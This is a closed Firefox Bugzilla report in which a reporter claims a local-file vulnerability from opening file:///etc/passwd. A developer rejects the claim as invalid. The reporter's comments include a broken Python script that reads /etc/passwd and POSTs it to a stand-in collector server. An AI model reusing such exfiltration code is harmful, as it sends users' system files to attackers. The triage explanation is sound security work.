Closed Bug 1863921 Opened 2 years ago Closed 1 years ago

firefox.com - Possible security breach regarding local files

Categories

(Core :: Security, defect)

Product:
Core
Component:
Security
Platform:
Desktop
Linux
Type:
defect

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: rbucata, Unassigned)

References

(
URL
)

Details

From github: https://github.com/webcompat/web-bugs/issues/129470.

<!-- @browser: Firefox 115.0 -->
<!-- @ua_header: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 -->
<!-- @reported_with: unknown -->

URL: https://firefox.com

Browser / Version: Firefox 115.0
Operating System: Linux
Tested Another Browser: Yes Chrome

Problem type: Something else
Description: found a unique way to trige lfi to my server from any user of morzella firefox
Steps to Reproduce:
i found a unique way to list lfi in browser where user can simply

open chrome
now file:///etc/passwd past this in search bar
you got loacal file on your browser

now to show impact .. i create a code which allows attacker to steal local file on ther own server . if user start this code on terminal firefox automaticaly give them /etc/passwd/ content on there server

<details>
<summary>View the screenshot</summary>
<img alt="Screenshot" src="https://webcompat.com/uploads/2023/11/c21d99b6-5e8c-466e-9e55-e131e1d6e1e7.jpg">
</details>

<details>
<summary>Browser Configuration</summary>
<ul>
<li>None</li>
</ul>
</details>

From webcompat.com with ❤️

Change performed by the Move to Bugzilla add-on.

The issue was reported via the webcompat.com reporter. Since the issue is related to a possible security breach in most of the browsers, as local files can be accessed as the reporter states using a code command, we have moved the issue. Please feel free to move the issue to the correct Product and Component.

URL: file:///etc/passwd
status-firefox-esr115: --- → affected
OS: Android → Linux
Hardware: Unspecified → Desktop
See Also: → https://github.com/webcompat/web-bugs/issues/129470

your welcome .. where to report this .. i know only this place to report any bug .. help to report it in correct place

Group: dom-core-security
Group: dom-core-security → core-security-release

Here's the rest of the comments from GitHub. I edited a bit to hopefully fix up the markup.

this is the code which allows attacker to get content of /etc/passwd to burp collabrator server :

import os
import subprocess
import requests

def open_chrome_and_execute_command(command):
"""Opens firefox and executes the given command."""
subprocess.Popen([firefox', '--incognito', '--new-window', command])

def send_response_data_to_server(response_data, server_url):
"""Sends the response data to the given server."""
requests.post(server_url, data=response_data)

if name == 'main':
  # Open firefox and execute the command.
  open_chrome_and_execute_command('file:////etc/passwd')

  # Get the response data.
 response_data = subprocess.check_output(['cat', '/etc/passwd'])

 # Send the response data to the server.
 send_response_data_to_server(response_data, 'http://example.com/api/v1/response-data')

in here you can change "subprocess.Popen(['firefox' ,"and remain same "])
and on

send_response_data_to_server(response_data, 'http://example.com/api/v1/response-data') you can set you collabrator server here and get a http ping back with user etc/passwd on your server

Why is it necessary to run a browser here? Can't you just already run cat on etc/passwd? If you can already trick somebody into running arbitrary commands locally I don't see how that's something the browser can do anything about.

Flags: needinfo?(chikusoni9249)

how can browser access my etc/passwd ? without my permission .. this is a security issue .. if i try other payload browser throws error than why etc/passwd is allowed ?

Flags: needinfo?(chikusoni9249)

and because you can also just type file:////etc/passwd on you browser and you can see there .../
as you can say about impact .. you can see abow code and there " send_response_data_to_server(response_data, 'http://example.com/api/v1/response-data')" .. here is the trick .. if user run this command the attacker get a ping from browser and get content of etc/passwd on attacker side ..

you can simply change example.com to burp collabrator and see this happen ..

The browser itself can access any file you, the person logged into the computer, can see. If file:///etc/passwd shows you the password file it's because the OS permissions are set to let you read that file.

Web pages on the internet cannot read that file, only you, explicitly opening that file, can cause it to be loaded. Of course every other program you run on your machine can do what you can do, so if those programs are controlling Firefox then they can make Firefox open that file. I don't know what the commands are in comment 3 but I assume they are some kind of automation framework running locally. That script is explicitly capturing browser content and sending it to your collector. Web content cannot do that. The locally-running script is responsible, and it doesn't need to use Firerfox to access and post that file content.

Status: NEW → RESOLVED
Closed: 1 years ago
Resolution: --- → INVALID
Group: core-security-release
status-firefox-esr115: affected → ---
You need to log in before you can comment on or make changes to this bug.